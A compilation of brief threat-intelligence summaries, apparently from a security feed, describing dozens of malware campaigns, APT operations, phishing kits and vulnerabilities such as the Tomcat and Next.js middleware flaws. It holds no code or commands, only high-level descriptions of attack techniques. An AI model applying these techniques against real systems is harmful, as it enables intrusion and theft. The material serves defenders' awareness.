The PoisonSeed campaign is targeting enterprise organizations and individuals outside the cryptocurrency industry by phishing CRM and bulk email provider credentials. The attackers export email lists and send bulk spam from compromised accounts, primarily to support cryptocurrency spam operations. The campaign uses a novel cryptocurrency seed phrase poisoning attack, providing security seed phrases to trick victims into copying them into new cryptocurrency wallets for future compromise. While similarities exist with Scattered Spider and CryptoChameleon groups, PoisonSeed is currently classified separately due to unique characteristics. The campaign has targeted companies like Coinbase, Ledger, Mailchimp, SendGrid, Hubspot, Mailgun, and Zoho, using sophisticated phishing techniques and automated processes to quickly exploit compromised accounts.

OUTLAW is a persistent Linux malware that uses basic techniques like SSH brute-forcing, SSH key manipulation, and cron-based persistence to maintain a long-lasting botnet. Despite its lack of sophistication, it remains active by leveraging simple but impactful tactics. The malware deploys modified XMRig miners, uses IRC for command and control, and includes publicly available scripts for persistence and defense evasion. OUTLAW's infection chain spans nearly the entire MITRE ATT&CK framework, offering many detection opportunities. It propagates in a worm-like manner, using compromised hosts to launch further SSH brute-force attacks on local subnets, rapidly expanding the botnet.

The Gootloader malware campaign has evolved its tactics, now using Google Ads to target victims seeking legal templates. The threat actor advertises legal documents, primarily agreements, through compromised ad accounts. Users searching for templates are directed to a malicious website where they are prompted to enter their email address. They then receive an email with a link to download a seemingly legitimate document, which is actually a zipped .JS file containing malware. When executed, the malware creates a scheduled task and uses PowerShell to communicate with compromised WordPress blogs. The campaign demonstrates a shift in Gootloader's strategy, moving from poisoned search results to controlled infrastructure for malware delivery.

A sophisticated web skimming campaign has been discovered, utilizing a legacy Stripe API to validate stolen payment details before exfiltration. The attack involves multiple stages, including malicious loader injection, decoding, and skimming. Jscrambler's research team identified 49 affected merchants and uncovered additional domains potentially involved in the campaign. The skimmers are tailored for each targeted site and exploit vulnerabilities in e-commerce platforms. The attackers employ minimal obfuscation and transmit stolen data without encryption. The campaign has been active since August 2024, primarily targeting WooCommerce and WordPress sites. To protect against such attacks, merchants are advised to implement real-time webpage monitoring and adopt hardened iframe implementations.

A sophisticated malware campaign has been uncovered, involving the distribution of BeaverTail and Tropidoor malware through fake recruitment emails. The attackers, suspected to be of North Korean origin, impersonated a developer community to lure victims into downloading malicious code. The campaign utilizes a downloader disguised as 'car.dll' and BeaverTail malware masquerading as 'tailwind.config.js'. BeaverTail functions as an infostealer and downloader, targeting web browsers and cryptocurrency wallets. Tropidoor, a backdoor malware, establishes communication with command and control servers, allowing remote execution of various commands. The attack methodology shares similarities with previous North Korean campaigns, including the use of techniques reminiscent of the Lazarus group's LightlessCan malware.

Microsoft has observed several phishing campaigns using tax-related themes to steal credentials and deploy malware as Tax Day approaches in the United States. These campaigns use redirection methods like URL shorteners and QR codes in malicious attachments, and abuse legitimate services to avoid detection. They lead to phishing pages delivered via RaccoonO365 platform, remote access trojans like Remcos, and other malware such as Latrodectus, BruteRatel C4, AHKBot, and GuLoader. The campaigns target various sectors including engineering, IT, consulting, and accounting firms. Threat actors use social engineering techniques to mislead taxpayers into revealing sensitive information, making payments to fake services, or installing malicious payloads. Microsoft provides detailed mitigation and protection guidance to help users and organizations defend against these tax-centric threats.

An attack involving BeaverTail and Tropidoor malware was discovered, targeting victims through fake recruitment emails from a developer community. The attackers provided a BitBucket link containing malicious code, including BeaverTail disguised as 'tailwind.config.js' and a downloader called 'car.dll'. BeaverTail, known for information theft and downloading additional payloads, was found in South Korea. The downloader shares similarities with the Lazarus group's LightlessCan malware. BeaverTail steals credential information and cryptocurrency wallet data from web browsers, while Tropidoor acts as a backdoor, connecting to C&C servers and executing various commands. The attack is suspected to be carried out by North Korean threat actors, highlighting the need for caution when dealing with executable files from unknown sources.

A security incident involving malicious sponsored ads distributing backdoored administrative tools was detected. Users searching for RVTools were served a tampered version containing ThunderShell, a PowerShell-based remote access tool. The malicious ads, appearing in Google search results, led to a site mimicking the legitimate RVTools download page. The trojanized file, when executed, installs RVTools but also deploys ThunderShell, allowing attackers to execute commands on compromised machines. Multiple ads from different verified advertisers were used to evade security controls. The campaign highlights the persistent threat of malvertising and the need for stronger ad screening processes and user awareness.

A novice cybercriminal, known as 'Coquettte', has been discovered using a Russian bulletproof hosting provider, Proton66, to distribute malware. The hacker's activities include deploying the Rugmi malware loader through a fake cybersecurity product website and selling guides for illegal substances and weapons. Coquettte is believed to be part of a loosely structured hacking collective called Horrid. The threat actor's infrastructure spans multiple domains and platforms, including GitHub, YouTube, and Last.fm. This network appears to serve as an incubator for aspiring cybercriminals, offering malware resources, hosting solutions, and a collaborative environment for underground hacking activities.

A malware campaign is distributing the TookPS downloader by impersonating popular software like UltraViewer, AutoCAD, SketchUp, Ableton, and Quicken. The malware establishes an SSH tunnel for remote access and deploys additional payloads like TeviRat and Lapmon backdoors. The attackers gain full system control through various methods. The campaign targets both individuals and organizations, using domains registered in early 2024. Users are advised to avoid downloading pirated software, while organizations should implement strict security policies and conduct regular awareness training.

Salvador Stealer is a newly discovered Android malware that poses as a banking application to steal sensitive user information. It employs a multi-stage attack chain, utilizing a dropper APK to install the main payload. The malware incorporates a phishing website within the app to collect personal and banking data, including Aadhaar numbers, PAN card details, and net banking credentials. It exfiltrates stolen information in real-time to both a phishing server and a Telegram-based Command and Control server. Salvador Stealer also intercepts SMS messages to capture one-time passwords and banking verification codes, bypassing two-factor authentication. The malware demonstrates persistence mechanisms, automatically restarting itself if stopped and surviving device reboots. Analysis revealed exposed infrastructure, including an accessible admin panel, potentially linking the attacker to India.

Since late 2024, attackers have employed new tactics in phishing documents containing QR codes. These include concealing final phishing destinations using legitimate websites' redirection mechanisms and adopting Cloudflare Turnstile for user verification. Some phishing sites specifically target credentials of particular victims. QR code phishing, or quishing, embeds phishing URLs into QR codes, enticing recipients to scan them with smartphones. This bypasses traditional security measures and targets personal devices. Attackers use URL redirection, exploit open redirects, and incorporate human verification within redirects to evade detection. The phishing operations typically involve redirection, human verification, and credential harvesting. These evolving tactics challenge both security detection mechanisms and user awareness.

In January 2025, a Managed Service Provider administrator was targeted by a sophisticated phishing attack impersonating a ScreenConnect authentication alert. The attackers, affiliated with Qilin ransomware and tracked as STAC4365, used an adversary-in-the-middle technique to bypass multi-factor authentication and gain access to the MSP's ScreenConnect environment. They deployed their own ScreenConnect instance across multiple customer networks, performed reconnaissance, collected and exfiltrated data, and ultimately deployed Qilin ransomware. This attack matches a pattern of similar incidents dating back to 2022, utilizing fake ScreenConnect domains and the evilginx framework to intercept credentials and session cookies. The attackers employed various tools for lateral movement and defense evasion, including PsExec, NetExec, and WinRM.

Lazarus, a North Korean state-sponsored threat actor, has launched a new campaign called ClickFake Interview targeting cryptocurrency job seekers. This campaign, an evolution of the previously documented Contagious Interview, uses fake job interview websites to deploy the GolangGhost backdoor on Windows and macOS systems. The infection chain leverages the ClickFix tactic, downloading and executing malicious payloads during the interview process. The campaign primarily targets centralized finance (CeFi) entities, aligning with Lazarus' focus on cryptocurrency-related targets. Notable changes include targeting non-technical roles and using ReactJS-based websites for the fake interviews. The malware provides remote control and data theft capabilities, including browser information exfiltration.

Silent Push Threat Analysts have uncovered a sophisticated phishing campaign targeting individuals sympathetic to Ukraine's defense, Russian citizens, and potential informants. The operation, believed to be orchestrated by Russian Intelligence Services, employs four major phishing clusters impersonating the CIA, Russian Volunteer Corps, Legion Liberty, and Hochuzhit. These campaigns aim to collect personal information from victims through fake websites and forms. The threat actors utilize bulletproof hosting, domain spoofing, and Google Forms to lure targets into providing sensitive data. The campaign's persistence, long-term targeting of specific groups, and impersonation of official organizations without apparent financial motives strongly suggest state-sponsored involvement. Mitigation efforts include identifying and blocking associated domains and IPs.

The SHELBY malware family exploits GitHub for command-and-control operations, employing sophisticated techniques to evade detection. The malware consists of a loader (SHELBYLOADER) and a backdoor (SHELBYC2), both obfuscated using Obfuscar. SHELBYLOADER employs various sandbox detection methods and uses GitHub for initial registration and key retrieval. SHELBYC2 communicates with the attacker's infrastructure using GitHub API, allowing for file uploads, downloads, and command execution. The campaign targets Iraqi telecommunications and potentially UAE airports, utilizing highly targeted phishing emails. Despite its sophistication, the malware's design has a critical flaw: anyone with the embedded Personal Access Token can control infected machines, exposing a significant security vulnerability.

A new social engineering technique exploiting ClickFix Captcha has emerged as an effective method for delivering various types of malware, including Quakbot. This technique deceives users and bypasses security measures by utilizing a seemingly harmless captcha. The process involves redirecting users to a ClickFix captcha that tricks them into executing a malicious command on their local machine. The command downloads and executes obfuscated PowerShell scripts, which then retrieve and deploy the actual malware payload. The attackers use sophisticated obfuscation techniques, including fake ZIP files and PHP-based droppers, to evade detection and analysis. This method's success lies in exploiting user trust in captchas and legitimate-looking websites, increasing the likelihood of unknowing malware execution.

A newly discovered Android banking Trojan, TsarBot, targets over 750 applications globally, including banking, finance, cryptocurrency, and e-commerce apps. It spreads through phishing sites masquerading as legitimate financial platforms and is installed via a dropper disguised as Google Play Services. TsarBot employs overlay attacks to steal credentials, records and remotely controls screens, and uses a fake lock screen to capture device lock credentials. It communicates with its C&C server using WebSocket across multiple ports to receive commands, send stolen data, and execute on-device fraud. The malware's capabilities include screen recording, keylogging, and SMS interception. Evidence suggests the threat actor behind TsarBot is likely of Russian origin.

A sophisticated phishing malware using Scalable Vector Graphics (SVG) format has been identified. The malware embeds malicious scripts within SVG files, using Base64 encoding to bypass detection. It employs various techniques to obstruct analysis, including blocking automation tools, preventing specific keyboard shortcuts, disabling right-clicks, and detecting debugging attempts. The malware redirects users to a fake CAPTCHA page, which, when interacted with, leads to further malicious actions, potentially a phishing site impersonating Microsoft login pages. This evolving threat highlights the need for increased user vigilance, especially when dealing with SVG files from unknown sources.

Konni RAT, a sophisticated remote access Trojan targeting Windows systems, employs a multi-stage attack process using batch files, PowerShell scripts, and VBScript. It exploits Windows Explorer limitations, obfuscates file paths, dynamically generates URLs, and uses temporary files to erase activity traces. The malware efficiently exfiltrates critical data to remote servers and maintains persistence through registry modifications. Key tactics include exploiting file extension hiding, the 260-character limit in LNK files, and complex variables for detection evasion. Konni RAT's modular design and advanced strategies present substantial risks to system security, highlighting the need for robust cybersecurity measures and proactive defense strategies.

A sophisticated malware campaign has been discovered, utilizing the Remcos RAT disguised as a shipping company waybill. The attack begins with an email containing an HTML script, which when executed, downloads a JavaScript file. This file creates and downloads several components, including a configuration file, an encoded Remcos binary, a legitimate AutoIt loader, and a malicious AutoIt script. The AutoIt script employs evasion techniques, establishes persistence, decrypts the Remcos binary, and executes shellcode. The shellcode injects Remcos into a legitimate process (RegSvcs.exe) using various API calls. The Remcos RAT, once active, can steal information and execute remote commands based on C2 instructions. The campaign demonstrates the evolving tactics of cybercriminals, emphasizing the need for caution when handling emails from unknown sources.

Infoblox discovered a phishing kit that creatively employs DNS mail exchange (MX) records to dynamically serve fake, tailored, login pages, spoofing over 100 brands.

HijackLoader, a malware loader discovered in 2023, has evolved with new modules and evasion tactics. Recent updates include call stack spoofing to mask function call origins, virtual machine detection to identify analysis environments, and persistence establishment via scheduled tasks. The loader now implements anti-VM checks, mutex creation, custom injection paths, and additional modules for various functions. Notable changes include the addition of new blocklisted processes and modifications to module decryption methods. HijackLoader's modular nature and continuous updates suggest ongoing efforts to enhance its anti-detection capabilities and complicate analysis.

A malicious campaign targeting First Ukrainian International Bank has been observed using the Emmenhtal loader to distribute SmokeLoader malware. The infection chain begins with a deceptive email containing a 7z archive, which extracts to reveal a bait PDF and a shortcut file. The shortcut downloads additional files, leading to the execution of PowerShell and Mshta to retrieve the Emmenhtal loader. This loader, disguised as a modified Windows utility, deploys SmokeLoader while maintaining a stealthy execution flow. SmokeLoader, a modular malware, can download additional payloads, steal credentials, and execute remote commands. The campaign demonstrates the evolving tactics of financially motivated threat actors, leveraging LOLBAS techniques and commercial protection tools for obfuscation.

Operation HollowQuill targets Russian research and defense networks, particularly the Baltic State Technical University, using weaponized decoy documents disguised as research invitations. The attack chain involves a malicious RAR file containing a .NET dropper, which deploys a Golang-based shellcode loader and a legitimate OneDrive application. The final payload is a Cobalt Strike beacon. The campaign focuses on academic institutions, military and defense industries, aerospace and missile technology, and government-oriented research entities within the Russian Federation. The threat actor employs sophisticated techniques, including anti-analysis measures, APC injection, and infrastructure rotation across multiple ASNs.

Earth Alux, a China-linked APT group, is actively conducting cyberespionage attacks against key sectors in the APAC and Latin American regions. The group exploits vulnerable services in exposed servers to gain initial access and deploys web shells like GODZILLA. Their primary backdoor, VARGEIT, is used alongside COBEACON for various stages of attack. Earth Alux employs advanced techniques such as DLL side-loading, anti-API hooking, and execution guardrails. They utilize tools like RAILLOAD and RAILSETTER for persistence and evasion. The group's capabilities include system information collection, file manipulation, command execution, and tool injection via mspaint processes. Earth Alux targets industries such as government, technology, logistics, and manufacturing, demonstrating a strategic focus on high-value information across different sectors.

A malicious website mimicking Zoom led to the installation of a trojanized installer, initiating a multi-stage attack. The initial payload, d3f@ckloader, downloaded additional components, including SectopRAT. After nine days, the threat actor deployed Brute Ratel and Cobalt Strike beacons for lateral movement. They used various techniques for discovery and credential access, including LSASS memory dumping. The attacker employed QDoor for proxying RDP connections, facilitating data collection and exfiltration via the cloud service Bublup. The intrusion culminated in the deployment of BlackSuit ransomware across multiple systems using PsExec, with a total time to ransomware of 194 hours over nine days.

A sophisticated phishing attack targeted Troy Hunt, compromising his Mailchimp account. The analysis reveals connections to the Scattered Spider group through domain pivoting. Using Validin's DNS, host response, and registration data, dozens of related domain names were uncovered. The investigation exposed a fake Cloudflare turnstile and bogus registration details. Pivoting on various features led to the discovery of multiple related domains and IP addresses. The attack's tactics strongly resemble those of Scattered Spider, including the reuse of previously used domains. The findings demonstrate the power of Validin's databases for uncovering adversary infrastructure and strengthening threat intelligence.

Water Gamayun, a suspected Russian threat actor, exploits the MSC EvilTwin zero-day vulnerability (CVE-2025-26633) to compromise systems and exfiltrate data. The group uses custom payloads like EncryptHub Stealer variants, SilentPrism and DarkWisp backdoors, as well as known malware like Stealc and Rhadamanthys. Their delivery methods include malicious provisioning packages, signed .msi files, and Windows MSC files. The attackers employ techniques such as LOLBins and encrypted communications to evade detection. Their infrastructure includes C&C servers for managing infected systems and exfiltrating data. The campaign highlights the group's adaptability and sophistication in cyber espionage operations.

A campaign targeting users in Ukraine with malicious LNK files has been observed since November 2024. The files, using Russian words related to troop movements as lures, run a PowerShell downloader contacting geo-fenced servers in Russia and Germany. The second stage payload uses DLL side loading to execute the Remcos backdoor. The activity is attributed to the Gamaredon threat actor group with medium confidence. The campaign uses the invasion of Ukraine as a theme in phishing attempts, distributing LNK files disguised as Office documents. The servers used are mostly hosted by GTHost and HyperHosting ISPs. The attack chain involves DLL sideloading to load the Remcos backdoor, which communicates with a C2 server on a specific port.

A critical path equivalence vulnerability in Apache Tomcat, CVE-2025-24813, allows unauthenticated attackers to execute arbitrary code on vulnerable servers under specific conditions. The vulnerability affects Tomcat versions 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, 9.0.0.M1 to 9.0.98, and certain 8.5.x versions. Exploitation requires specific server configurations and involves sending malicious PUT and GET requests. Six malicious IP addresses have been identified attempting to exploit this vulnerability, targeting systems in the US, Japan, Mexico, South Korea, and Australia. Multiple proof-of-concept exploits have been published, increasing the likelihood of ongoing exploitation attempts. Users are advised to upgrade to patched versions or implement network-level controls to restrict access to the Tomcat server.

This newsletter discusses the process of money laundering in the context of cybercrime, particularly ransomware attacks. It explains the three basic steps of money laundering: placement, layering, and integration. The author expresses concern about regulatory changes that might facilitate easier money laundering, emphasizing the importance of targeting money laundering infrastructure to combat cybercrime. The newsletter also highlights recent security issues, including airport outages in Malaysia, satellite security, and a Chrome zero-day vulnerability. Additionally, it provides information on upcoming security events and lists prevalent malware files detected by Talos telemetry.

The article discusses a network of phishing domains targeting Russians searching for anti-Putin organizations. These domains mimic recruitment websites of Ukrainian paramilitary groups and intelligence agencies. The scam aims to collect personal information from potential recruits, likely for Russian intelligence services. Victims who fall for these phishing attempts risk severe legal consequences, including lengthy prison sentences for alleged treason. The phishing sites are promoted through search engine manipulation, appearing at the top of results on platforms like Yandex, DuckDuckGo, and Bing. The campaign's effectiveness is demonstrated by regular reports of arrests in Russia related to alleged attempts to aid Ukrainian forces.

In the latest campaign, X-Ops researchers found PJobRAT samples disguising themselves as instant messaging apps. In our telemetry, all the victims appeared to be based in Taiwan.

In February, C/Side uncovered a threat actor targeting over 35,000 websites with a malicious full-page hijack injection. C/Side continued to monitor this actor’s activities and have identified new tactics and techniques. They’ve scaled up their operations significantly, as we now estimate that approximately 150,000 websites have been impacted by this campaign.

Kimsuky, also known as “Black Banshee,” a North Korean APT group active at least from 2012, is believed to be state-sponsored. Their cyber espionage targets countries like South Korea, Japan, and the U.S. Their tactics include phishing, malware infections (RATs, backdoors, wiper malware), supply chain attacks, lateral movement within networks and data exfiltration.

A Pakistan-based APT group, assessed with medium confidence as APT36, who created a fake IndiaPost website to target and infect both Windows and Android users.

A critical vulnerability, CVE-2025-29927, with a CVSS score of 9.1 was disclosed on March 21, 2025. This flaw allows attackers to bypass authorization checks in Next.js Middleware, potentially granting unauthorized access to protected resources. The vulnerability affects applications using Middleware for user authorization, session data validation, route access control, redirections, and UI visibility management. The issue stems from how the runMiddleware function handles the x-middleware-subrequest header. Attackers can craft malicious headers to bypass middleware controls. Affected versions range from 11.1.4 to 15.2.3. Users are urged to update to patched versions or implement mitigation strategies to block external requests containing the vulnerable header.

ESET researchers analyze the ransomware ecosystem in 2024, focusing on the newly emerged RansomHub gang. They uncover connections between RansomHub affiliates and rival gangs Play, Medusa, and BianLian through the use of EDRKillShifter, a custom EDR killer developed by RansomHub. The researchers leverage the widespread adoption of EDRKillShifter to track affiliate activities across multiple gangs and reconstruct its development timeline. The article also discusses the rise of EDR killers in ransomware attacks and provides insights into their anatomy and defense strategies. Despite disruptions to major ransomware groups, new threats like RansomHub quickly filled the void, highlighting the need for continued vigilance and law enforcement efforts targeting both operators and affiliates.

A new malware campaign is targeting users attempting to download the Snow White movie through torrent sites. The attackers exploit a compromised blog to distribute a malicious torrent package disguised as a pirated version of the film. The package contains a fake codec installer that, when executed, deploys sophisticated malware. This malware disables security features, installs the TOR browser, and communicates with a Dark Web C2 server. The campaign revives old social engineering tactics while incorporating modern malware delivery methods and anti-detection techniques. The article provides file hashes and IoCs for detection, emphasizing the ongoing risks associated with pirated content and the importance of updated security measures.

CoffeeLoader is a sophisticated malware family discovered in September 2024, designed to download and execute second-stage payloads while evading detection. It employs numerous techniques to bypass security solutions, including a GPU-utilizing packer, call stack spoofing, sleep obfuscation, and Windows fibers. The malware uses HTTPS for command-and-control communications with certificate pinning to prevent man-in-the-middle attacks. It supports various commands for injecting and running shellcode, executables, and DLLs. CoffeeLoader shares similarities with SmokeLoader, which has been observed distributing it. The loader implements advanced features beneficial for evading detection by antivirus, EDRs, and malware sandboxes, making it a formidable threat in the crowded market of malware loaders.

ESET researchers uncovered new activity by the FamousSparrow APT group, including two undocumented versions of their SparrowDoor backdoor. The group compromised a US financial sector trade group and a Mexican research institute in July 2024. The new SparrowDoor versions show significant improvements in code quality and architecture, implementing command parallelization. FamousSparrow also used the ShadowPad backdoor for the first time. The analysis revealed links between FamousSparrow and other China-aligned threat actors like Earth Estries. The group's continued development of tools during a period of apparent inactivity suggests they remained active but undetected from 2022 to 2024.

Two critical security flaws, CVE-2025-2746 and CVE-2025-2747, have been discovered in Kentico Xperience 13, a digital experience platform. These vulnerabilities allow unauthenticated attackers to bypass the Staging Sync Server's authentication, potentially gaining administrative control over the CMS. Both issues have a CVSS score of 9.8, indicating their severity. The vulnerabilities affect Kentico Xperience through version 13.0.178 when the Staging Service is enabled and configured to use username/password authentication. Exploitation can lead to unauthorized administrative access, remote code execution, data breaches, and system disruption. Mitigation steps include patching, disabling or restricting the Staging Service, using certificate-based authentication, and implementing enhanced monitoring and hardening measures.

A sophisticated malware campaign targeting npm packages has been discovered, involving two malicious packages: ethers-provider2 and ethers-providerz. These packages act as downloaders, hiding their malicious payload cleverly. Upon installation, they patch the legitimate locally-installed npm package 'ethers' with a new file containing malicious code. This patched file ultimately serves a reverse shell, connecting to the threat actor's server. The malware employs evasive techniques, maintaining persistence even after removal of the original malicious package. This approach demonstrates a high level of sophistication and poses a significant threat to software supply chain security. The campaign also includes other related packages, highlighting the growing scope of risks for both software producers and end-user organizations.

ReaderUpdate, a macOS malware loader platform active since 2020, has evolved to include variants written in Crystal, Nim, Rust, and now Go programming languages. Originally a compiled Python binary, the malware has been largely dormant until late 2024. The loader is capable of executing remote commands, potentially offering Pay-Per-Install or Malware-as-a-Service. It collects system information, creates persistence mechanisms, and communicates with command and control servers. The Go variant, less common than others, uses string obfuscation techniques to hinder analysis. While currently associated with adware delivery, the loader's capabilities pose a potential threat for more malicious payloads in the future.

This guide demonstrates how to use Hunt.io to investigate and track malicious infrastructure. Starting with a single suspicious IP address, the process involves analyzing hosting providers, domain information, open ports, HTTP responses, and TLS certificates. The investigation reveals connections to potential cryptocurrency fraud and malware operations. By leveraging Hunt's scan data and SQL queries, a small cluster of related servers is identified, possibly linked to Latrodectus malware. The guide emphasizes the importance of persistence, pattern recognition, and correlating data from multiple intelligence sources to effectively track threat actor operations.

In March 2025, a sophisticated malware campaign exploited a zero-day vulnerability in Google Chrome to infect targets. The attack, dubbed Operation ForumTroll, used personalized phishing emails with short-lived links to deliver malware. Kaspersky detected the exploit, reported it to Google, and an update was released to fix the vulnerability (CVE-2025-2783). The campaign targeted media outlets, educational institutions, and government organizations in Russia, disguising itself as invitations to the 'Primakov Readings' forum. The attackers' goal appears to be espionage, and the sophistication of the malware suggests a state-sponsored APT group is behind the operation. The exploit chain involved sandbox escape and remote code execution, though only the former was fully analyzed.

Trend Research uncovered a campaign by the Russian threat actor Water Gamayun that exploits a zero-day vulnerability in the Microsoft Management Console framework to execute malicious code, named MSC EvilTwin (CVE-2025-26633).

Cybercriminals are exploiting .NET MAUI, a cross-platform development framework, to create Android malware that evades detection. These threats disguise themselves as legitimate apps, targeting users to steal sensitive information. The malware campaigns use techniques such as hiding code in blob files, multi-stage dynamic loading, and encrypted communications to avoid security measures. Two examples are discussed: a fake bank app targeting Indian users and a fake social media app targeting Chinese-speaking users. The latter employs advanced evasion techniques like excessive permissions in the AndroidManifest.xml file and encrypted socket communication. Users are advised to be cautious when downloading apps from unofficial sources and to use up-to-date security software for protection.

GorillaBot is a newly discovered Mirai-based botnet that has launched over 300,000 attacks across more than 100 countries, targeting various industries including telecommunications, finance, and education. It reuses Mirai's core logic while adding custom encryption and evasion techniques. The malware uses raw TCP sockets and a custom XTEA-like cipher for C2 communication, implements anti-debugging and anti-analysis checks, and authenticates to its C2 server using a SHA-256-based token. Attack commands are encoded, hashed, and processed using a Mirai-style attack_parse function. GorillaBot's sophistication highlights the ongoing evolution of legacy malware and the need for advanced analysis tools to combat such threats.

Cybercriminals are targeting YouTube creators with a sophisticated malware campaign using the Clickflix technique. Attackers impersonate popular brands and offer fake collaboration opportunities to lure victims. The campaign employs spearphishing emails with malicious attachments and links to fake Microsoft webpages. These pages trick users into executing PowerShell scripts that download and run malware, such as Lumma Stealer. The malware steals browser data, cryptocurrency wallet information, and other sensitive data, transmitting it to command and control servers. The attack chain includes stealth and persistence mechanisms to evade detection. This campaign exploits content creators' interest in brand deals and partnerships, representing an evolution of previously observed tactics against YouTube channels.

Sygnia uncovered a sophisticated China-nexus threat actor, Weaver Ant, targeting a major Asian telecom company. The group employed web shells and tunneling techniques for persistence and lateral movement, maintaining access for over four years. They utilized encrypted China Chopper and custom 'INMemory' web shells, along with a recursive HTTP tunnel tool for internal network access. Weaver Ant demonstrated advanced evasion techniques, including ETW patching, AMSI bypassing, and 'PowerShell without PowerShell' execution. The operation involved extensive reconnaissance, credential harvesting, and data exfiltration. Despite eradication attempts, the group showed remarkable persistence, adapting their tactics to regain access.

SnakeKeylogger is a highly active credential-stealing malware targeting individuals and businesses. It employs a multi-stage infection chain, starting with malicious spam emails containing .img files. The malware uses sophisticated techniques like process hollowing and obfuscation to evade detection. It targets various applications, including web browsers, email clients, and FTP software, to harvest sensitive data and credentials. The campaign utilizes an Apache server for malware distribution, regularly updating encrypted payloads. SnakeKeylogger's primary objective is to collect Outlook profile credentials, email configurations, and stored authentication details, which can be exploited for business email compromise or sold on underground markets.

A sophisticated phishing campaign targeting Counter-Strike 2 players has been uncovered, employing browser-in-the-browser (BitB) attacks. The campaign aims to steal Steam accounts by creating convincing fake browser pop-ups that mimic legitimate login pages. The threat actors are abusing the identity of the pro eSports team Navi and promoting their scams on platforms like YouTube. The stolen accounts are likely intended for resale on online marketplaces. The majority of the phishing sites are in English, with one Chinese site discovered. This campaign highlights the ongoing evolution of phishing techniques and the importance of vigilance when encountering login pop-ups, especially for desktop users.

VanHelsing RaaS, a new ransomware-as-a-service program launched on March 7, 2025, has quickly gained traction in the cybercrime world. With a low $5,000 deposit for affiliates, it offers an 80% cut of ransom payments. The service provides a user-friendly control panel and targets multiple platforms, including Windows, Linux, BSD, ARM, and ESXi systems. Within two weeks of its launch, VanHelsing infected three victims, demanding large ransoms. The ransomware, written in C++, is actively evolving, with two variants discovered just five days apart. It employs various techniques to evade detection, including a 'Silent' mode and selective encryption of files. The rapid growth and sophistication of VanHelsin gRaaS highlight the increasing threat of ransomware attacks.

SvcStealer 2025 is a newly discovered information stealer malware distributed through spear phishing emails. It targets sensitive data including machine information, installed software, user credentials, cryptocurrency wallets, and browser data. The malware creates a unique folder, terminates specific processes, and harvests data from various sources. It compresses the collected information and sends it to a command and control server. The malware can also download additional payloads and implements evasion techniques. It targets multiple browsers, messaging applications, and specific file types. The campaign was observed in late January 2025, with the threat actors potentially selling the stolen data on underground forums and marketplaces.

Phishing remains a prevalent cybersecurity threat, causing financial loss, data theft, and malware deployment. Attackers are expanding targets across platforms and using AI to refine techniques, making detection more challenging. Real-time anti-phishing (RTAP) solutions using AI and machine learning are crucial to combat emerging threats. Recent trends show Facebook as a consistent target, with Roblox and various platforms like Telegram, Coinbase, and PayPal also being targeted. FortiGuard Labs offers advanced RTAP services, employing machine learning, URL reputation checks, and content analysis. Employee awareness and education are essential, with tools like FortiPhish and FortiSAT available for training. The evolving nature of phishing attacks necessitates continuous adaptation of cybersecurity measures to stay ahead of cybercriminals.

A sophisticated phishing campaign targeting Meta Business accounts has been uncovered by the Cofense Phishing Defense Center. The attack begins with a fake Instagram alert claiming the user's ads are suspended due to policy violations. Victims are directed to a fraudulent page mimicking Meta's business help center, where they're prompted to interact with a fake chat support or follow step-by-step instructions. The ultimate goal is to trick users into adding the attacker's device as a secure login method via Two-Factor Authentication, effectively hijacking the account. The campaign employs convincing email templates, landing pages, and even includes live agent support to add credibility. Users are urged to verify communications and examine URLs carefully before taking action to protect their social media credentials.

ESET researchers have uncovered a global espionage operation called Operation FishMedley, conducted by the FishMonger APT group, which is operated by the Chinese contractor I-SOON. The campaign targeted governments, NGOs, and think tanks across Asia, Europe, and the United States during 2022. The attackers used implants like ShadowPad, SodaMaster, and Spyder, which are common or exclusive to China-aligned threat actors. The operation involved sophisticated tactics including lateral movement, credential theft, and custom malware deployment. Seven victims were identified across various countries and sectors. The analysis provides technical details on the malware used, initial access methods, and command and control infrastructure.

ClickFix is an emerging social engineering tactic that manipulates users into executing malicious actions under the guise of troubleshooting or system maintenance. Attackers present fake error messages, CAPTCHA verifications, or system prompts to convince users to take actions that compromise their devices, often by manually copying and pasting malicious commands into the command line. This method bypasses modern security solutions by tricking users into executing commands themselves. Recent campaigns like OBSCURE#BAT and Storm-1865 have targeted various industries and regions. The attack vector has been observed in Field Effect's telemetry, with attempts to deploy AsyncRAT and other malware. Mitigation strategies include restricting command line use, deploying advanced threat detection solutions, enhancing email and web filtering, training users, and maintaining up-to-date security measures.

The Albabat ransomware group has evolved its malware to target Windows, Linux, and macOS devices, as evidenced by new versions 2.0.0 and 2.5. The group is using GitHub to streamline operations, storing configuration files and essential components. The ransomware ignores specific folders, encrypts certain file extensions, and kills various processes. It collects system information and stores it in a PostgreSQL database. The GitHub repository, created in February 2024, shows active development with increased activity during specific hours. A newer version 2.5 is likely in development, introducing new cryptocurrency wallets. To mitigate the threat, organizations should implement regular backups, network segmentation, system updates, and user training.

FIN7, a notorious cybercrime group, has developed a new Python-based backdoor called AnubisBackdoor. This sophisticated tool employs multi-stage attacks, encryption, and obfuscation techniques to evade detection. The malware is distributed through phishing campaigns and uses AES encryption with multiple layers of obfuscation. AnubisBackdoor's core functionality includes network communication, system access, and anti-analysis features. It can execute commands, manipulate files, and gather system information. The backdoor maintains persistence through Windows Registry and uses a custom command protocol for C2 communication. This new tool demonstrates FIN7's continued evolution in developing covert communication channels and highlights their advanced capabilities in cybercrime operations.

The ABYSSWORKER driver is a malicious tool used in conjunction with MEDUSA ransomware to disable anti-malware systems. It employs a HEARTCRYPT-packed loader and a revoked certificate-signed driver to target and silence EDR vendors. The driver imitates a legitimate CrowdStrike Falcon driver and uses obfuscation techniques to hinder analysis. It provides various functionalities including file manipulation, process and driver termination, and EDR system disabling. The driver's capabilities include removing callbacks, replacing driver functions, killing system threads, and detaching mini-filter devices. It uses unconventional methods like creating IRPs from scratch to perform file operations. The malware's sophisticated approach demonstrates the evolving tactics of cybercriminals in evading detection and disabling security measures.

A malicious campaign targeting Windows users through WordPress websites is deploying the LummaStealer trojan. Attackers use fake Cloudflare verification prompts to trick users into running malicious PowerShell commands. The infection is spread through compromised plugins or injected JavaScript in legitimate files. Victims are directed to execute commands that download and install the LummaStealer malware, which can steal sensitive data like login credentials and cryptocurrency information. The attackers also create hidden admin users in infected WordPress sites for persistence. Multiple variants of this attack have been observed, with some using URL shortening services to obfuscate malicious links. Website owners are advised to keep software updated, use strong passwords, and implement 2FA to mitigate risks.

